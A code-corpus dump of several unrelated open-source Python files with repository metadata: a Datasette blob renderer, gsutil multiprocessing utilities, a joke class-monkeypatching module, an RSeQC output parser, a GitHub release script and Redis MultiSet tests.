    position.shares_qty = new_shares_qty  # type: ignore
    await position.save()
| 38.488889
| 133
| 0.762702
|
794b153e3c8ddb7fc6d2539cdbd8fd94fe60ccdd
| 1,926
|
py
|
Python
|
datasette/blob_renderer.py
|
Quentinchampenois/datasette
|
13d1228d80c91d382a05b1a9549ed02c300ef851
|
[
"Apache-2.0"
] | 1
|
2020-11-03T17:40:11.000Z
|
2020-11-03T17:40:11.000Z
|
datasette/blob_renderer.py
|
Quentinchampenois/datasette
|
13d1228d80c91d382a05b1a9549ed02c300ef851
|
[
"Apache-2.0"
] | null | null | null |
datasette/blob_renderer.py
|
Quentinchampenois/datasette
|
13d1228d80c91d382a05b1a9549ed02c300ef851
|
[
"Apache-2.0"
] | null | null | null |
from datasette import hookimpl
from datasette.utils.asgi import Response, BadRequest
from datasette.utils import to_css_class
import hashlib
_BLOB_COLUMN = "_blob_column"
_BLOB_HASH = "_blob_hash"
async def render_blob(datasette, database, rows, columns, request, table, view_name):
    """Streams one BLOB cell as a binary download attachment.

    Query string contract:
      - ?_blob_column=NAME (required): which column to serve; must be present
        in `columns`.
      - ?_blob_hash=SHA256 (optional): selects the row whose value has this
        SHA-256 hex digest; without it the first row is used.

    Returns:
        Response with Content-Disposition attachment and a filename derived
        from table, primary-key path, column, and hash prefix.

    Raises:
        BadRequest: missing/invalid column, or no row matches the hash.
    """
    if _BLOB_COLUMN not in request.args:
        raise BadRequest("?{}= is required".format(_BLOB_COLUMN))
    blob_column = request.args[_BLOB_COLUMN]
    if blob_column not in columns:
        raise BadRequest("{} is not a valid column".format(blob_column))
    # If ?_blob_hash= provided, use that to select the row - otherwise use first row
    blob_hash = None
    if _BLOB_HASH in request.args:
        blob_hash = request.args[_BLOB_HASH]
        for row in rows:
            value = row[blob_column]
            if hashlib.sha256(value).hexdigest() == blob_hash:
                break
        else:
            # Loop did not break
            raise BadRequest(
                "Link has expired - the requested binary content has changed or could not be found."
            )
    else:
        # NOTE(review): assumes `rows` is non-empty here — an empty result
        # would raise IndexError rather than BadRequest; confirm upstream.
        row = rows[0]
        value = row[blob_column]
    filename_bits = []
    if table:
        filename_bits.append(to_css_class(table))
    if "pk_path" in request.url_vars:
        filename_bits.append(request.url_vars["pk_path"])
    filename_bits.append(to_css_class(blob_column))
    if blob_hash:
        # The first 6 hex chars are enough to disambiguate the download name.
        filename_bits.append(blob_hash[:6])
    filename = "-".join(filename_bits) + ".blob"
    headers = {
        # Prevent browsers from content-sniffing the binary payload.
        "X-Content-Type-Options": "nosniff",
        "Content-Disposition": 'attachment; filename="{}"'.format(filename),
    }
    return Response(
        body=value or b"",
        status=200,
        headers=headers,
        content_type="application/binary",
    )
@hookimpl
def register_output_renderer():
    """Registers the .blob extension with Datasette's output-renderer hook."""
    renderer = {
        "extension": "blob",
        "render": render_blob,
        # Link-target only: never offered in the visible format list.
        "can_render": lambda: False,
    }
    return renderer
| 31.064516
| 100
| 0.641745
|
794b15b0e7149528568a3fb643c35c8f477c9fe5
| 13,761
|
py
|
Python
|
gslib/utils/parallelism_framework_util.py
|
zakrywilson/gsutil
|
e13bdb44341361a67e43828aabd00999dc74d05d
|
[
"Apache-2.0"
] | null | null | null |
gslib/utils/parallelism_framework_util.py
|
zakrywilson/gsutil
|
e13bdb44341361a67e43828aabd00999dc74d05d
|
[
"Apache-2.0"
] | null | null | null |
gslib/utils/parallelism_framework_util.py
|
zakrywilson/gsutil
|
e13bdb44341361a67e43828aabd00999dc74d05d
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
# Copyright 2013 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Utility classes and methods for the parallelism framework."""
from __future__ import absolute_import
from __future__ import print_function
import collections
import multiprocessing
import threading
import traceback
from six.moves import queue as Queue
import gslib
from gslib.utils import constants
from gslib.utils import system_util
# pylint: disable=g-import-not-at-top
try:
# This module doesn't necessarily exist on Windows.
import resource
_HAS_RESOURCE_MODULE = True
except ImportError, e:
_HAS_RESOURCE_MODULE = False
# Maximum time to wait (join) on the SeekAheadThread after the ProducerThread
# completes, in seconds.
SEEK_AHEAD_JOIN_TIMEOUT = 60
# Timeout for puts/gets to the global status queue, in seconds.
STATUS_QUEUE_OP_TIMEOUT = 5
# Maximum time to wait (join) on the UIThread after the Apply
# completes, in seconds.
UI_THREAD_JOIN_TIMEOUT = 60
ZERO_TASKS_TO_DO_ARGUMENT = ('There were no', 'tasks to do')
# Multiprocessing manager used to coordinate across all processes. This
# attribute is only present if multiprocessing is available, which can be
# determined by calling CheckMultiprocessingAvailableAndInit().
global top_level_manager # pylint: disable=global-at-module-level
# Cache the values from this check such that they're available to all callers
# without needing to run all the checks again (some of these, such as calling
# multiprocessing.Manager(), are expensive operations).
_cached_multiprocessing_is_available = None
_cached_multiprocessing_check_stack_trace = None
_cached_multiprocessing_is_available_message = None
# This must be defined at the module level for pickling across processes.
MultiprocessingIsAvailableResult = collections.namedtuple(
'MultiprocessingIsAvailableResult', ['is_available', 'stack_trace'])
class AtomicDict(object):
  """Thread-safe (and optionally process-safe) dictionary protected by a lock.

  When a multiprocessing.Manager is supplied at construction time, the dict
  is safe across both processes and threads; otherwise it is thread-safe
  only.
  """
  def __init__(self, manager=None):
    """Initializes the dict.

    Args:
      manager: (multiprocessing.Manager or None) Manager instance (required
          for cross-process safety), or None if cross-process safety is not
          needed.
    """
    if not manager:
      self.lock = threading.Lock()
      self.dict = {}
    else:
      self.lock = manager.Lock()
      self.dict = manager.dict()
  def __getitem__(self, key):
    with self.lock:
      return self.dict[key]
  def __setitem__(self, key, value):
    with self.lock:
      self.dict[key] = value
  # pylint: disable=invalid-name
  def get(self, key, default_value=None):
    """Returns the value for key, or default_value when absent."""
    with self.lock:
      return self.dict.get(key, default_value)
  def delete(self, key):
    """Removes key from the dict; raises KeyError when absent."""
    with self.lock:
      del self.dict[key]
  def values(self):
    """Returns the stored values, read under the lock."""
    with self.lock:
      return self.dict.values()
  def Increment(self, key, inc, default_value=0):
    """Atomically updates the stored value associated with the given key.

    Performs the atomic equivalent of
        dict[key] = dict.get(key, default_value) + inc.

    Args:
      key: lookup key for the value of the first operand of the "+" operation.
      inc: second operand of the "+" operation.
      default_value: default used when there is no existing value for key.

    Returns:
      The incremented value.
    """
    with self.lock:
      updated = self.dict.get(key, default_value) + inc
      self.dict[key] = updated
      return updated
class ProcessAndThreadSafeInt(object):
  """Process- and thread-safe integer counter.

  Backed by a multiprocessing.Value of type 'i' when multiprocessing is
  available, otherwise by a plain int guarded by a threading.Lock. This lets
  callers treat cross-process and thread-only counters uniformly instead of
  writing:

    global variable_name
    if isinstance(variable_name, int):
      return variable_name
    else:
      return variable_name.value
  """
  def __init__(self, multiprocessing_is_available):
    self.multiprocessing_is_available = multiprocessing_is_available
    if multiprocessing_is_available:
      # multiprocessing.Value carries its own implicit lock.
      self.value = multiprocessing.Value('i', 0)
    else:
      self.lock = threading.Lock()
      self.value = 0
  def Reset(self, reset_value=0):
    """Sets the counter back to reset_value (default 0)."""
    if self.multiprocessing_is_available:
      self.value.value = reset_value
    else:
      with self.lock:
        self.value = reset_value
  def _Add(self, delta):
    """Adds delta to the counter under the appropriate lock."""
    if self.multiprocessing_is_available:
      self.value.value += delta
    else:
      with self.lock:
        self.value += delta
  def Increment(self):
    """Adds one to the counter."""
    self._Add(1)
  def Decrement(self):
    """Subtracts one from the counter."""
    self._Add(-1)
  def GetValue(self):
    """Returns the current counter value."""
    if self.multiprocessing_is_available:
      return self.value.value
    else:
      with self.lock:
        return self.value
def _IncreaseSoftLimitForResource(resource_name, fallback_value):
  """Raises the soft limit for the given OS resource as far as possible.

  First tries to lift the soft limit all the way to the hard limit; failing
  that, tries fallback_value, but only when doing so would actually increase
  the current soft limit. The hard limit itself is system-controlled and can
  never be exceeded.

  Args:
    resource_name: Name of the resource to increase the soft limit for.
    fallback_value: Value to try if the hard limit cannot be used (e.g.,
        when the hard limit is reported as "unlimited").

  Returns:
    The soft limit in effect after any changes we managed to make, or -1 if
    the resource does not exist on this platform.
  """
  try:
    soft_limit, hard_limit = resource.getrlimit(resource_name)
  except (resource.error, ValueError):
    # The resource isn't present on this system; nothing we can do.
    return -1

  if hard_limit > soft_limit:  # Some OS's report 0 for "unlimited".
    try:
      resource.setrlimit(resource_name, (hard_limit, hard_limit))
      return hard_limit
    except (resource.error, ValueError):
      pass  # Fall through and try the fallback value instead.

  if soft_limit >= fallback_value:
    # The fallback would not be an improvement; keep what we have.
    return soft_limit
  try:
    resource.setrlimit(resource_name, (fallback_value, hard_limit))
    return fallback_value
  except (resource.error, ValueError):
    # Couldn't change the soft limit; report its current value.
    return soft_limit
def CheckMultiprocessingAvailableAndInit(logger=None):
  """Checks if multiprocessing is available, initializing it if so.

  There are some environments in which there is no way to use multiprocessing
  logic that's built into Python (e.g., if /dev/shm is not available, then
  we can't create semaphores). This simply tries out a few things that will be
  needed to make sure the environment can support the pieces of the
  multiprocessing module that we need.

  If multiprocessing is available, this performs necessary initialization for
  multiprocessing. See gslib.command.InitializeMultiprocessingVariables for
  an explanation of why this is necessary.

  Args:
    logger: (logging.Logger) Logger to use for debug output.

  Returns:
    (MultiprocessingIsAvailableResult) A namedtuple with the following attrs:
      - multiprocessing_is_available: True iff the multiprocessing module is
        available for use.
      - stack_trace: The stack trace generated by the call we tried that
        failed.
  """
  # pylint: disable=global-variable-undefined
  global _cached_multiprocessing_is_available
  global _cached_multiprocessing_check_stack_trace
  global _cached_multiprocessing_is_available_message
  # The probe below is run only once per process; subsequent calls return
  # the memoized verdict (and replay the warning to the supplied logger).
  if _cached_multiprocessing_is_available is not None:
    if logger:
      logger.debug(_cached_multiprocessing_check_stack_trace)
      logger.warn(_cached_multiprocessing_is_available_message)
    return MultiprocessingIsAvailableResult(
        is_available=_cached_multiprocessing_is_available,
        stack_trace=_cached_multiprocessing_check_stack_trace)

  # Windows is rejected up front (and the verdict is NOT cached here; the
  # check is cheap enough to repeat).
  if system_util.IS_WINDOWS:
    message = """
Multiple processes are not supported on Windows. Operations requesting
parallelism will be executed with multiple threads in a single process only.
"""
    if logger:
      logger.warn(message)
    return MultiprocessingIsAvailableResult(is_available=False,
                                            stack_trace=None)

  stack_trace = None
  multiprocessing_is_available = True
  message = """
You have requested multiple processes for an operation, but the
required functionality of Python\'s multiprocessing module is not available.
Operations requesting parallelism will be executed with multiple threads in a
single process only.
"""
  try:
    # Fails if /dev/shm (or some equivalent thereof) is not available for use
    # (e.g., there's no implementation, or we can't write to it, etc.).
    try:
      multiprocessing.Value('i', 0)
    except:
      message += """
Please ensure that you have write access to both /dev/shm and /run/shm.
"""
      raise  # We'll handle this in one place below.

    global top_level_manager  # pylint: disable=global-variable-undefined
    top_level_manager = multiprocessing.Manager()

    # Check that the max number of open files is reasonable. Always check this
    # after we're sure that the basic multiprocessing functionality is
    # available, since this won't matter unless that's true.
    limit = -1
    if _HAS_RESOURCE_MODULE:
      # Try to set this with both resource names - RLIMIT_NOFILE for most Unix
      # platforms, and RLIMIT_OFILE for BSD. Ignore AttributeError because the
      # "resource" module is not guaranteed to know about these names.
      try:
        limit = max(
            limit,
            _IncreaseSoftLimitForResource(
                resource.RLIMIT_NOFILE,
                constants.MIN_ACCEPTABLE_OPEN_FILES_LIMIT))
      except AttributeError:
        pass
      try:
        limit = max(
            limit,
            _IncreaseSoftLimitForResource(
                resource.RLIMIT_OFILE,
                constants.MIN_ACCEPTABLE_OPEN_FILES_LIMIT))
      except AttributeError:
        pass

    if limit < constants.MIN_ACCEPTABLE_OPEN_FILES_LIMIT:
      message += ("""
Your max number of open files, %s, is too low to allow safe multiprocessing.
On Linux you can fix this by adding something like "ulimit -n 10000" to your
~/.bashrc or equivalent file and opening a new terminal.
On macOS, you may also need to run a command like this once (in addition to the
above instructions), which might require a restart of your system to take
effect:
launchctl limit maxfiles 10000
Alternatively, edit /etc/launchd.conf with something like:
limit maxfiles 10000 10000
""" % limit)
      raise Exception('Max number of open files, %s, is too low.' % limit)
  except:  # pylint: disable=bare-except
    # Any failure above lands here: record the trace, fall back to threads.
    stack_trace = traceback.format_exc()
    multiprocessing_is_available = False
    if logger is not None:
      logger.debug(stack_trace)
      logger.warn(message)

  # Set the cached values so that we never need to do this check again.
  _cached_multiprocessing_is_available = multiprocessing_is_available
  _cached_multiprocessing_check_stack_trace = stack_trace
  _cached_multiprocessing_is_available_message = message
  return MultiprocessingIsAvailableResult(
      is_available=_cached_multiprocessing_is_available,
      stack_trace=_cached_multiprocessing_check_stack_trace)
def CreateLock():
  """Returns a multiprocessing lock when available, else a threading lock.

  A manager-backed multiprocessing lock is handed out only when the
  environment supports the parts of the multiprocessing module we rely on.

  Returns:
    Multiprocessing or threading lock.
  """
  if not CheckMultiprocessingAvailableAndInit().is_available:
    return threading.Lock()
  return top_level_manager.Lock()
# Pylint gets confused by the mixed lower and upper-case method names in
# AtomicDict.
# pylint: disable=invalid-name
def PutToQueueWithTimeout(queue, msg, timeout=STATUS_QUEUE_OP_TIMEOUT):
  """Puts an item onto the status queue, retrying forever on Queue.Full.

  Each attempt times out after `timeout` seconds and is simply retried, so
  no single call blocks indefinitely. This avoids deadlock during shutdown,
  since Python signal handlers cannot execute in between instructions of the
  Python interpreter (see https://docs.python.org/2/library/signal.html for
  details) and a fully blocking put would never yield to them.

  Args:
    queue: Queue class (typically the global status queue)
    msg: message to post to the queue.
    timeout: (optional) amount of time to wait before repeating put request.
  """
  while True:
    try:
      queue.put(msg, timeout=timeout)
      return
    except Queue.Full:
      continue
# pylint: enable=invalid-name
| 34.488722
| 80
| 0.729598
|
794b15b9b98f303ae93321d6d0dcf4190dbefd07
| 870
|
py
|
Python
|
communism.py
|
mdbecker/python_communism
|
23598b3be9461b1ecd1e1e05dab4a5f7bd24d433
|
[
"Unlicense"
] | null | null | null |
communism.py
|
mdbecker/python_communism
|
23598b3be9461b1ecd1e1e05dab4a5f7bd24d433
|
[
"Unlicense"
] | null | null | null |
communism.py
|
mdbecker/python_communism
|
23598b3be9461b1ecd1e1e05dab4a5f7bd24d433
|
[
"Unlicense"
] | null | null | null |
from typing import Iterable, Union
def revolution(to_convert: Union[dict, Iterable]):
    """Convert every non-builtin class found in *to_convert* to 'communism':
    afterwards all of its instances compare equal to anything and share one
    common hash value.

    Accepts a dict (its values are processed) or an iterable; modules in the
    input have every class in their namespace converted.
    """
    import builtins
    import inspect
    from types import MethodType

    # We must protect the builtin elite to not be affected by the revolution.
    protected_elite = dir(builtins)

    def convert(c):
        if not (inspect.isclass(c) and c.__name__ not in protected_elite):
            return
        try:
            c.__eq__ = MethodType(lambda s, _: True, c)
            c.__hash__ = MethodType(lambda s: hash(1), c)
        except:
            print(f"Failed to convert {c} to communism.")

    members = to_convert.values() if isinstance(to_convert, dict) else to_convert
    for member in members:
        if inspect.ismodule(member):
            for candidate in vars(member).values():
                convert(candidate)
        else:
            convert(member)
| 32.222222
| 88
| 0.62069
|
794b17f4b986639cea5572a09373c7c5d66c3046
| 153
|
py
|
Python
|
src/virtualenvrunner/_version.py
|
petrieh/virtualenvrunner
|
5764a789e492479812261fbe4982ac0d50c5212f
|
[
"BSD-3-Clause"
] | null | null | null |
src/virtualenvrunner/_version.py
|
petrieh/virtualenvrunner
|
5764a789e492479812261fbe4982ac0d50c5212f
|
[
"BSD-3-Clause"
] | null | null | null |
src/virtualenvrunner/_version.py
|
petrieh/virtualenvrunner
|
5764a789e492479812261fbe4982ac0d50c5212f
|
[
"BSD-3-Clause"
] | null | null | null |
__copyright__ = 'Copyright (C) 2019, Nokia'

# Package version metadata; GITHASH is empty unless stamped at build time.
VERSION = '1.1'
GITHASH = ''


def get_version():
    """Return the package version string."""
    return VERSION


def get_githash():
    """Return the git hash the package was built from ('' when unknown)."""
    return GITHASH
| 12.75
| 43
| 0.666667
|
794b180a5aab333cc9910ae838d4fa2e1e559dcd
| 4,540
|
py
|
Python
|
infer_parser.py
|
RuiNascimento/infer_parser
|
973da3a8dfe5018b5953d41d2ecfdd364f1b80e8
|
[
"MIT"
] | null | null | null |
infer_parser.py
|
RuiNascimento/infer_parser
|
973da3a8dfe5018b5953d41d2ecfdd364f1b80e8
|
[
"MIT"
] | null | null | null |
infer_parser.py
|
RuiNascimento/infer_parser
|
973da3a8dfe5018b5953d41d2ecfdd364f1b80e8
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
'''
A simple script to automate the use of infer_experiment.py provided in the REsQC package.
Output of infer_experiment.py can be pipep into infer_parser or used as an argument.
Example usage:
infer_experiment -i aligment.sam -r reference.bed | ./infer_parser.py
or
./infer_parser.py infer_experiment_output.txt
Args:
filename, output of infer_experiment, can be pipep via stdin alternativelly
-i, --ignore_failed, ignore the failed to determine fraction
-m, --max_failed, float fraction of maximum allowed for the failed to determine fraction. Default = 0.1
-s, --simple, Simple output, for usage in scripts/pipelines.
'''
import sys
import os
import argparse
__author__ = "Rui Nascimento"
__copyright__ = "Copyright 2019, Rui Nascimento"
__credits__ = ["Rui Nascimento"]
__license__ = "MIT License"
__version__ = "1.0.1"
__maintainer__ = "Rui Nascimento"
__email__ = "rui_nascimento93@hotmail.com"
__status__ = "Development"
# Verbose management
def blockPrint():
    """Silence all print() output by pointing sys.stdout at the null device."""
    devnull = open(os.devnull, 'w')
    sys.stdout = devnull
def enablePrint():
    """Restore sys.stdout to the interpreter's original standard output."""
    sys.stdout = sys.__stdout__
# Determine the type of experiment
def type_of_experiment(data):
    """Print whether the infer_experiment output describes a single-end or
    pair-end experiment (always returns None; output is print-only)."""
    for marker, label in (('SingleEnd', 'Single End experiment'),
                          ('PairEnd', 'Pair End experiment')):
        if marker in data:
            print(label)
            return
    print('Could not determine type of experiment!')
# Parse the fractions
def get_info(data):
    """Parse infer_experiment output into its three fractions.

    Handles both single-end ("++,--" / "+-,-+") and pair-end
    ("1++,1--,2+-,2-+" / "1+-,1-+,2++,2--") report lines.

    Returns:
        (failed, first, second) as strings; a descriptive fallback string is
        returned for any fraction that was not found in the input.
    """
    failed = "Couldn't determine the failed fraction"
    first = "Couldn't determine the '++,--' fraction"
    second = "Couldn't determine the '+-,-+' fraction"
    for line in data.splitlines():
        value = line.partition(': ')[2]
        if line.startswith('Fraction of reads failed to determine:'):
            failed = value
        elif line.startswith(('Fraction of reads explained by "++,--":',
                              'Fraction of reads explained by "1++,1--,2+-,2-+":')):
            first = value
        elif line.startswith(('Fraction of reads explained by "+-,-+":',
                              'Fraction of reads explained by "1+-,1-+,2++,2--":')):
            second = value
    return (failed, first, second)
# Check if failed fraction is to big
def check_failed(info, max_failed=0.1):
    """Exit (SystemExit) when the failed-to-determine fraction info[0]
    exceeds max_failed; otherwise return None quietly.

    Raises ValueError if info[0] is not parseable as a float.
    """
    failed_fraction = float(info[0])
    if failed_fraction <= max_failed:
        return
    print('Failed fraction is more than '+'{:.2%}'.format(max_failed)+' of the data, please double check results')
    exit()
# Check strand to infer HTseq --stranded option to use
def check_strand(info):
    """Infer and print the HTseq --stranded option from the '++,--' and
    '+-,-+' fractions in info[1] and info[2].

    NOTE(review): relies on the module-level ``args`` (for --simple) and on
    ``enablePrint()``, so it is only callable after argument parsing.
    """
    first, second = float(info[1]), float(info[2])
    difference = abs(first-second)
    # Ambiguous zone: warn, then fall through -- since difference < 0.15,
    # the else branch below still reports "unstranded".
    if difference > 0.02 and difference < 0.15:
        print('Please double check infer_experiment results!')
    if difference >= 0.15:
        if first > second:
            print("--stranded yes")
            # With --simple, diagnostics were silenced by blockPrint();
            # re-enable stdout and emit only the bare keyword.
            if args.simple:
                enablePrint()
                print('yes')
        else:
            print('--stranded reverse')
            if args.simple:
                enablePrint()
                print('reverse')
    else:
        print("++,-- and +-,-+ factions too similiar, probabily unstranded")
        print("--stranded no")
        if args.simple:
            enablePrint()
            print('no')
# Arguments configuration
parser = argparse.ArgumentParser(prog='infer_parser.py', usage='%(prog)s [options]', description='A simple script to pipe the output of infer_experiment.py in order to determine the correct arguments for HTseq.')
parser.add_argument('-i', '--ignore_failed', action='store_false', help='Ignore fraction of failed to determine.')
parser.add_argument('-m', '--max_failed', action='store', type=float, metavar='', help='Maximum allowed for the failed to determine fraction. Example: -m 0.1')
parser.add_argument('-s', '--simple', action='store_true', help='Simple output, for usage in scripts/pipelines.')
parser.add_argument('filename', nargs='?')
args = parser.parse_args()

if __name__ == "__main__":
    # Input comes from a filename argument or, failing that, from a pipe.
    if args.filename:
        data = open(args.filename).read()
    elif not sys.stdin.isatty():
        data = sys.stdin.read()
    else:
        parser.print_help()
        exit()
    # --simple silences diagnostics; check_strand() re-enables stdout just
    # before printing the bare yes/no/reverse keyword.
    if args.simple:
        blockPrint()
    type_of_experiment(data)
    info = get_info(data)
    # -i/--ignore_failed uses store_false, so ignore_failed defaults to True
    # and the failed-fraction check runs unless -i is passed.
    if args.ignore_failed:
        if args.max_failed:
            check_failed(info, max_failed=args.max_failed)
        else:
            check_failed(info, max_failed=0.1)
    check_strand(info)
| 36.031746
| 212
| 0.648899
|
794b18480b943544f18b789cfe627b267ce66824
| 2,483
|
py
|
Python
|
release.py
|
ownrecipes/OwnRecipes
|
733e60d4abae59481a33f5663b902a32dda7afdc
|
[
"MIT"
] | 1
|
2022-03-12T12:23:49.000Z
|
2022-03-12T12:23:49.000Z
|
release.py
|
ownrecipes/OwnRecipes
|
733e60d4abae59481a33f5663b902a32dda7afdc
|
[
"MIT"
] | 4
|
2022-02-18T15:27:06.000Z
|
2022-03-31T10:39:30.000Z
|
release.py
|
ownrecipes/OwnRecipes
|
733e60d4abae59481a33f5663b902a32dda7afdc
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# encoding: utf-8
import json
import requests
from requests.auth import HTTPBasicAuth
from secrets.secrets import username, password
def release(_repo, _tag, _name, _target, _body, _draft, _prerelease):
    """
    Send a post request to github to log a release.
    Then print out the response status and message.
    """
    payload = {
        "tag_name": _tag,
        "target_commitish": _target,
        "name": _name,
        "body": _body,
        "draft": _draft,
        "prerelease": _prerelease
    }
    url = 'https://api.github.com/repos/ownrecipes/%s/releases' % _repo
    response = requests.post(
        url,
        json=payload,
        auth=HTTPBasicAuth(username, password)
    )
    print('Status: %s' % response)
    print('Response: %s' % response.text)
# Define some help text that the json file should follow.
help_text = '''
A JSON file with release info in it. See below for an example.
{
"tag": "1.1.1",
"name": "Release Test",
"body": "the is a test release!",
"target": "master",
"draft": false,
"prerelease": false
}
'''
if __name__ == '__main__':
    import argparse

    parser = argparse.ArgumentParser(
        description='OwnRecipes release script.'
    )

    # Require a json file as part of the script
    parser.add_argument(
        'release',
        type=str,
        help=help_text
    )

    # Open the json file and try and parse it into a json file
    with open(parser.parse_args().release, 'r') as fp:
        args = json.loads(fp.read())

    # All json files should have this format.
    json_format = [
        'tag',
        'name',
        'target',
        'body',
        'draft',
        'prerelease',
    ]

    # Iterate through the `json_format` array and
    # make sure the json file supplied has all the required fields.
    for key in json_format:
        if key not in args:
            # Bug fix: the placeholder was "$s", so the %-format raised
            # TypeError ("not all arguments converted") instead of telling
            # the user which field was missing.
            print("%s missing! Please add it." % key)
            exit(1)

    # The list of repos we want to push a release to.
    repos = [
        'ownrecipes-nginx',
        'ownrecipes-api',
        'ownrecipes-web',
        'OwnRecipes'
    ]

    # Run a release for all the repos with the data from json file.
    for r in repos:
        release(
            r,
            args.get('tag'),
            args.get('name'),
            args.get('target'),
            args.get('body'),
            args.get('draft'),
            args.get('prerelease')
        )
| 25.080808
| 70
| 0.573097
|
794b18b92a2bf24f04f197842bc90711af9b974f
| 5,001
|
py
|
Python
|
tests/test_counter.py
|
Heiss/py-datatype-redis
|
db75b94c22a3c5fecb202e9138892c674a62d47f
|
[
"MIT"
] | null | null | null |
tests/test_counter.py
|
Heiss/py-datatype-redis
|
db75b94c22a3c5fecb202e9138892c674a62d47f
|
[
"MIT"
] | 2
|
2020-07-22T08:01:42.000Z
|
2020-08-17T11:11:07.000Z
|
tests/test_counter.py
|
Heiss/py-datatype-redis
|
db75b94c22a3c5fecb202e9138892c674a62d47f
|
[
"MIT"
] | null | null | null |
from tests.prepare import BaseTestCase, datatype_redis, unittest
import collections
class CounterTests(BaseTestCase):
    """Checks that datatype_redis.MultiSet mirrors collections.Counter.

    Each test builds a stdlib Counter and a MultiSet from the same input and
    asserts that the two behave identically.

    NOTE(review): assertItemsEqual is the Python 2 unittest name (renamed
    assertCountEqual in Python 3); presumably BaseTestCase provides it --
    verify when porting.
    """

    def test_value(self):
        # Construction from an iterable and from keyword counts.
        a = "wagwaan"
        b = {"hot": 420, "skull": -9000}
        c = collections.Counter(a)
        d = datatype_redis.MultiSet(a)
        e = collections.Counter(**b)
        f = datatype_redis.MultiSet(**b)
        self.assertEqual(d, c)
        self.assertEqual(f, e)

    def test_empty(self):
        self.assertEqual(datatype_redis.MultiSet(), collections.Counter())

    def test_values(self):
        a = "wagwaan"
        b = {"hot": 420, "skull": -9000}
        c = collections.Counter(a)
        d = datatype_redis.MultiSet(a)
        e = collections.Counter(**b)
        f = datatype_redis.MultiSet(**b)
        # Order-insensitive comparison: value order is unspecified.
        self.assertItemsEqual(c.values(), d.values())
        self.assertItemsEqual(e.values(), f.values())

    def test_get(self):
        a = "wagwaan"
        b = {"hot": 420, "skull": -9000}
        c = collections.Counter(a)
        d = datatype_redis.MultiSet(a)
        e = collections.Counter(**b)
        f = datatype_redis.MultiSet(**b)
        self.assertEqual(c.get("a"), d.get("a"))
        self.assertEqual(c.get("flute", "don"), d.get("flute", "don"))
        self.assertEqual(e.get("hot"), f.get("hot"))
        self.assertEqual(e.get("skull"), f.get("skull"))
        # NOTE(review): this compares e against itself; probably intended
        # to compare e.get(...) with f.get(...).
        self.assertEqual(e.get("flute", "don"), e.get("flute", "don"))

    def test_del(self):
        # Deleting a key that was never added must not raise.
        a = datatype_redis.MultiSet("wagwaan")
        del a["hotskull"]

    def test_update(self):
        # update() from a MultiSet, a Counter, an iterable, a mapping and
        # keyword arguments must all match Counter.update().
        a = "wagwaan"
        b = {"hotskull": 420}
        c = collections.Counter(a)
        d = datatype_redis.MultiSet(a)
        c.update(datatype_redis.MultiSet(a))
        d.update(datatype_redis.MultiSet(a))
        self.assertEqual(d, c)
        c = collections.Counter(a)
        d = datatype_redis.MultiSet(a)
        c.update(collections.Counter(a))
        d.update(collections.Counter(a))
        self.assertEqual(d, c)
        c = collections.Counter(a)
        d = datatype_redis.MultiSet(a)
        c.update(a)
        d.update(a)
        self.assertEqual(d, c)
        c = collections.Counter(a)
        d = datatype_redis.MultiSet(a)
        c.update(b)
        d.update(b)
        self.assertEqual(d, c)
        c = collections.Counter(a)
        d = datatype_redis.MultiSet(a)
        c.update(**b)
        d.update(**b)
        self.assertEqual(d, c)

    def test_subtract(self):
        # Same matrix of input kinds as test_update, for subtract().
        a = "wagwaan"
        b = {"hotskull": 420}
        c = collections.Counter(a)
        d = datatype_redis.MultiSet(a)
        c.subtract(datatype_redis.MultiSet(a))
        d.subtract(datatype_redis.MultiSet(a))
        self.assertEqual(d, c)
        c = collections.Counter(a)
        d = datatype_redis.MultiSet(a)
        c.subtract(collections.Counter(a))
        d.subtract(collections.Counter(a))
        self.assertEqual(d, c)
        c = collections.Counter(a)
        d = datatype_redis.MultiSet(a)
        c.subtract(a)
        d.subtract(a)
        self.assertEqual(d, c)
        c = collections.Counter(a)
        d = datatype_redis.MultiSet(a)
        c.subtract(b)
        d.subtract(b)
        self.assertEqual(d, c)
        c = collections.Counter(a)
        d = datatype_redis.MultiSet(a)
        c.subtract(**b)
        d.subtract(**b)
        self.assertEqual(d, c)

    def test_intersection(self):
        a = "wagwaan"
        b = "flute don"
        c = collections.Counter(a)
        d = datatype_redis.MultiSet(a)
        c &= datatype_redis.MultiSet(b)
        d &= datatype_redis.MultiSet(b)
        self.assertEqual(d, c)
        c = collections.Counter(a)
        d = datatype_redis.MultiSet(a)
        c &= collections.Counter(b)
        d &= collections.Counter(b)
        self.assertEqual(d, c)

    def test_union(self):
        a = "wagwaan"
        b = "flute don"
        c = collections.Counter(a)
        d = datatype_redis.MultiSet(a)
        c |= datatype_redis.MultiSet(b)
        d |= datatype_redis.MultiSet(b)
        self.assertEqual(d, c)
        c = collections.Counter(a)
        d = datatype_redis.MultiSet(a)
        c |= collections.Counter(b)
        d |= collections.Counter(b)
        self.assertEqual(d, c)

    def test_elements(self):
        a = "wagwaan"
        b = {"hotskull": 420}
        c = collections.Counter(a)
        d = datatype_redis.MultiSet(a)
        e = collections.Counter(**b)
        f = datatype_redis.MultiSet(**b)
        # Sorted so that element order differences don't matter.
        self.assertItemsEqual(sorted(c.elements()), sorted(d.elements()))
        self.assertItemsEqual(sorted(e.elements()), sorted(f.elements()))

    def test_most_common(self):
        a = "wagwaan"
        b = collections.Counter(a)
        c = datatype_redis.MultiSet(a)
        d = 420
        check = b.most_common(d)
        # Only counts are compared: with tied counts the element order is
        # unspecified and may differ between implementations.
        for i, e in enumerate(c.most_common(d)):
            self.assertEqual(e[1], check[i][1])
        check = b.most_common()
        for i, e in enumerate(c.most_common()):
            self.assertEqual(e[1], check[i][1])
| 32.686275
| 74
| 0.570686
|
794b192ae0f0dd6f573334d1884ec9e2cfd331ec
| 747
|
py
|
Python
|
Python/remove-duplicates-from-sorted-array-ii.py
|
bssrdf/LeetCode-5
|
746df5cff523361145a74d9d429dc541a7b99910
|
[
"MIT"
] | 68
|
